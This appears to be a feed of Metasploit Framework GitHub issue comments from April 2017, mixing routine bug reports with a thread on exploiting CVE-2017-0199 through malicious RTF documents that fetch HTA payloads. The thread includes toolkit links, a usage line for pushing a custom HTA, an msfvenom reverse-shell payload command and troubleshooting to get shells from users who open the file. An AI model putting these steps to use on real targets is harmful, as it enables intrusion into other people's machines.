Appreciate the suggestion to include locally compiled libraries (instead of the relying on the system variants) is the 'correct' longer term solution. However, on latest rolling Kali I bumped into this issue with the vmauthd_version module and a quick fix was to change, line 116, from ...SSLContext.new(:SSLv3) to use SSLv23 instead. (Worked on a variety of VMware boxes)

[2017-04-17 06:14] nixawk commented on #8220
@vysec @busterb @demonsec666  Please check https://github.com/rapid7/metasploit-framework/pull/8254

[2017-04-17 08:04] demonsec666 commented on #8220
Nice work！thanks :)

[2017-04-17 09:27] 7sDream commented on #8247
@busterb

Thanks for your quick response and code working!

I found there is a update of msf, new version is `4.14.12+20170416092901~1rapid7-1`, but the file is still missing.

So, is there any place I can download this DLL from to make it work?

Or old version deb package of msf without this bug to re-install?

[2017-04-17 09:46] jork2345 commented on #8220
_gre_

[2017-04-17 09:54] busterb commented on #8247
The package with the fix hasn't finished building yet - it will be finished in a few hours.

In the mean time, older packages are available at https://apt.metasploit.com or https://rpm.metasploit.com

[code]

[2017-04-17 10:08] bhdresh commented on #8220
Nice one, thank you,

Meanwhile this was my attempt to get meterpreter shell through CVE-2017-0199

https://github.com/bhdresh/CVE-2017-0199

[2017-04-17 10:15] nixawk commented on #8220
If dev team handles https://github.com/rapid7/metasploit-framework/pull/8253, maybe I'll try a new with meterpreter session.

[2017-04-17 10:22] 7sDream commented on #8247
@busterb

Nice (temporary) solution.  It's very kind of you. :)

[2017-04-17 21:30] egypt opened #8258 "`jobs -i` stack traces with undefined method 'show_options'"
Initially reported by `octet` in IRC, reproduced locally on master

## Steps to reproduce

1. Run a module as a job
  * `use auxiliary/server/socks4a`
  * `run`
2. List detailed job info
  * `jobs -i 0`

## Expected behavior

Msfconsole displays detailed job info with datastore options for the given job

## Current behavior

[code]

## System stuff

### Metasploit version

Current master (85845b3b

[2017-04-17 21:41] OJ commented on #5245
Blog link is dead, new blog link is: https://www.securestate.com/blog/2012/01/06/new-meterpreter-extension-released-msfmap-beta
Source repo is: https://code.google.com/archive/p/msfmap/source/default/source

[2017-04-18 02:33] busterb commented on #8247
You're welcome. Nice avatar btw.

[2017-04-18 09:02] vysec commented on #8220
Just FYI. OLE links made in 2016 differ from other versions such as 2013. Therefore I found that a 2016 document could not be triggered on a 2013 machine.

[2017-04-18 09:12] nixawk commented on #8220
@vysec Could you share a copy ?

[2017-04-18 15:55] wvu-r7 commented on #8258
#7655

[2017-04-19 01:45] #7135 closed

[2017-04-19 04:02] hostbob commented on #8220
i have been trying to figure this out but not seems to get it, i host .hta file and insert it via insert-object but can't see any hta file executing. can someone share how this can be archived?

[2017-04-19 05:08] bhdresh commented on #8220
Hi,

Are you trying with "exploit/windows/misc/hta_server"? it was not working
for me either. It pop-up a black screen but no reverse connection from
reverse shell.

To overcome this I wrote a quick py script which could generate malicious
doc based on @nixawk <https://github.com/nixawk> template and also act as a
HTA web server to deliver the payloads.

Have a loot @ https://github.com/bhdresh/CV

[2017-04-19 05:08] bhdresh commented on #8220
Hi,

Are you trying with "exploit/windows/misc/hta_server"? it was not working
for me either. It pop-up a blank screen but no reverse connection from
reverse shell.

To overcome this I wrote a quick py script which could generate malicious
doc based on @nixawk <https://github.com/nixawk> template and also act as a
HTA web server to deliver the payloads.

Have a loot @ https://github.com/bhdresh/CV

[2017-04-19 05:26] nixawk commented on #8220
Please try it with a IE cache clean.

[2017-04-19 06:40] hostbob commented on #8220
thanks for your response

Am i doing this wrong, what i did was. i host an .hta file and insert into object in ms word then save it as .rtf

i have tried your python script before messaging here but it gives this error in the image

http://prntscr.com/ey5bg0

can u kindly put me through properly as i am using a custom .hta and custom way to get connection from user who run the .rtf file

[2017-04-19 06:51] huxinyi718 opened #8264 "staged mettle, meterpreter and other Linux shellcode cannot resolve dns in victim"
## Steps to reproduce

1. msfvenom -p linux/mipsle/mettle/reverse_tcp LHOST=example.domain LPORT=4444 -f elf -o /tmp/elf

## Expected behavior

It should start an reverse shell to the domain

## Current behavior
mettle exit with "Segmentation fault"

I use tcpdump port 53 in victim ,but noting

## System stuff

### Metasploit version

4.14.10-dev

### I installed Metasploit with:
- [  ] Kali packa

[2017-04-19 07:34] nixawk commented on #8220
@hostbob  I've created a py script for the job.

https://github.com/nixawk/labs/blob/master/CVE-2017-0199/exploit.py

[2017-04-19 08:00] golfreeze commented on #8064
seem it will upload script such as window or linux bash script then running to create process.
Just upgrade Struts 2 for fixed problem , Right ?

[2017-04-19 08:08] busterb commented on #8264
Please try the stageless version instead, which will do DNS resolution:
`linux/mipsle/mettle_reverse_tcp`

The staged version does not do DNS resolution because that's how the stager works - it is minimal shellcode to load the main stage, and in this case Metasploit will try to do the DNS resolution itself and embed the IP address into the shellcode. Changing this requires a change to the general

[2017-04-19 08:12] yf007 opened #8265 "ms17_010 error"
https://localhost:3790/workspaces/1/tasks/new_module_run/auxiliary/windows/smb/smb_ms17_010

Communication Error

Problem Description

The Pro Service returned a server-side error. This may be caused by a badly behaving target system or session.The specific error was Msf::RPC::Exception Invalid Module (["lib/msf/core/rpc/v10/rpc_base.rb:25:in `error'", "lib/msf/core/rpc/v10/rpc_module.rb:408:in `_

[2017-04-19 08:21] bhdresh commented on #8220
@hostbob,

Hosting and inserting an .hta file manually will directly execute it while inserting in to rtf.

For script, try to execute python script as "python cve-2017-0199_toolkit.py -h"

https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/master/cve-2017-0199_toolkit.py

Regards,
-Bhadresh

[2017-04-19 08:41] busterb commented on #8265
Hi, the error says 'Invalid Module' - this means that we have not actually released Metasploit Pro with that module yet. Pro could probably do a better job communicating this, but your best bet for now is to either grab a nightly framework build, or wait until the next Pro release in a day or two.

[2017-04-19 08:53] #8265 closed

[2017-04-19 08:56] hostbob commented on #8220
I really appreciate your time bro, this is what i have done

https://2.lithi.io/qDoxsQ5.png
https://2.lithi.io/z8WFm.png
https://2.lithi.io/oXANtQ.png
https://2.lithi.io/YyMnq.png

But getting error at the end of execution, kindly advice what i am missing

[2017-04-19 09:04] hostbob commented on #8220
oh less i forget, tested on windows 7 32bit ms word 2007 and windows 8 ms word 2010 32bit also

[2017-04-19 09:15] jymcheong commented on #8220
If some of you are having difficulty reproducing the observation in Win7, you are likely using a fresh Win7, see https://www.youtube.com/watch?v=ac6LM7WAx64

I noted @nixawk observation regarding the registry key but it seems like a fresh Win7 regardless SP1 or not is not vulnerable. By "fresh", I mean hardly any patches installed. See the video for yourself. The VM that has black background also

[2017-04-19 09:24] hostbob commented on #8220
saw the video, but this was tested against windows 7 32bit vmware and windows 8 32bit vmware.  is this also affect windows 8 and windows server 2008. i only got pop warning but file not executed

[2017-04-19 09:24] bhdresh commented on #8220
@hostbob, Looks like the document was generated properly.

As per instruction, once the document will be opened it will request http://2.lithi.io/5LjNsE.HTA and try to execute it.

Please share what is not working here? Are you not receiving "https://2.lithi.io/5LjNsE.HTA" request from target once document is opened or is this HTA not getting executed after delivery? It seems "https://2.lithi.io/5

[2017-04-19 09:34] jymcheong commented on #8220
@hostbob,

@bhdresh asked good questions. Try with a simple test-case first, eg. the launch calculator HTA script that was shared earlier in this thread. If that works, then it has something to do with the custom HTA.

If even the simple test-case doesn't work, check that your web-server that is hosting the HTA file is forcing Content-Type as application/hta, otherwise the hta would just be render

[2017-04-19 09:45] huxinyi718 commented on #8264
Yes. Stagedless payload works well.
But are there some easy ways to make staged mettle do the DNS resolutionin victm?

[2017-04-19 09:50] bhdresh commented on #8220
@jymcheong , thank you :)

@hostbob , just follow the instructions provide in guide at https://github.com/bhdresh/CVE-2017-0199, the toolkit acts as a HTA + Web server so just point your HTA URL you are including in RTF to toolkit port in exploitation mode and its done :)

Please feel free of you have any question or issue.

Regards,
-Bhadresh

[2017-04-19 11:12] hostbob commented on #8220
ok i am gonna admit i am dump and can't seems to get this. i do not know what i am really missing. @bhdresh can you please inbox me your email or IM ID at edwardmoa@mail.ru? maybe an instant chat will solve this

Thank you @jymcheong for your contribution as well

[2017-04-19 11:59] bhdresh commented on #8220
@hostbob , no issues buddy, I sent you an email :)

[2017-04-19 14:02] busterb commented on #8264
easy is relative. we could make a script-based stager that uses python, perl, php, or shell(wget/curl) to do the injection. That's pretty much what the command stagers do already.

If you want a native shellcode blob suitable for using in a BoF, etc, someone just needs to write the shellcode for it. Add a couple of syscalls for doing the name resolution, and some struct manipulation. Are you still

[2017-04-19 18:05] busterb commented on #8171
hdm raised a good point too, in that simply running as sudo means you are left with a file owned by root. It would be nice if there was some way to stream the data to stdout instead so there is also no intermediate file.

[2017-04-20 09:07] timwr opened #8269 "Module request: EternalPulsar"
You can follow this tutorial to inject a meterpreter DLL using FuzzBunch:
http://www.hackingtutorials.org/exploit-tutorials/exploiting-eternalblue-for-shell-with-empire-msfconsole/

It would be nice to have DoublePulsar and EternalBlue modules (amongst others) as standalone modules:
https://github.com/DonnchaC/shadowbrokers-exploits/blob/master/windows/fb.py

[2017-04-20 11:28] hostbob commented on #8220
@bhdresh  i think you are busy, please anyone still have interest in helping out in this? i am using a custom hta file. what i do not understand is can this exploit work without using metasploit thing and is it only hta file it can work on? kindly share your idea brothers i will love to see me being successful testing this i hate trying to test something and see myself not getting it :D

[2017-04-20 12:40] bhdresh commented on #8220
@hostbob, I am updating python script at https://github.com/bhdresh/CVE-2017-0199 to push custom hta.

Usage: python cve-2017-0199.py -M exp -H custom.hta

Hope this will help.

[2017-04-20 13:00] hostbob commented on #8220
you have been really helpful @bhdresh i really appreciate your help from the start. when do you think will be done?

[2017-04-20 13:25] bhdresh commented on #8220
Please try beta version from
https://github.com/bhdresh/CVE-2017-0199/blob/v2.0-beta-3/cve-2017-0199_toolkit.py

On 20 April 2017 at 17:01, hostbob <notifications@github.com> wrote:

[2017-04-20 13:36] snemes commented on #8220
Just a sidenote, you will need to have Internet Explorer 10 installed for the exploit to work under Windows 7.

[2017-04-20 13:43] hostbob commented on #8220
how about windows 8,8.1 and 10 both 32 and 64bit? it requires this as well?

[2017-04-20 13:55] snemes commented on #8220
As far as I know Windows 8 already comes with Internet Explorer 10 preinstalled, so I guess you don't need to do anything there - but I have not tried it. If you do, please share the results with us too. :)

[2017-04-21 00:23] nixawk commented on #8269
## METASPLOIT && PAYLOAD

[code]

----

[code]

## ETERNALBLUE && Doublepulsar

[code]

----

[code]

If exploit packets is uploaded here, it'll looks good.

[2017-04-21 08:37] v-p-b opened #8272 "GitHub gem(s) not found when using Gemfile.local.example"
## Steps to reproduce

1. On master branch using rbenv, after msfupdate
2. Copy Gemfile.local.example to Gemfile.local (as described [here](https://github.com/rapid7/metasploit-framework/wiki/Oracle-Usage#install-the-gem) for example)
3. ./msfconsole
4. Startup fails with the following error: "The git source https://github.com/busterb/bit-struct is not yet checked out. Please run `bundle install`

[2017-04-21 08:46] busterb commented on #8272
It is telling you what to do - `Please run bundle install` - did you do that?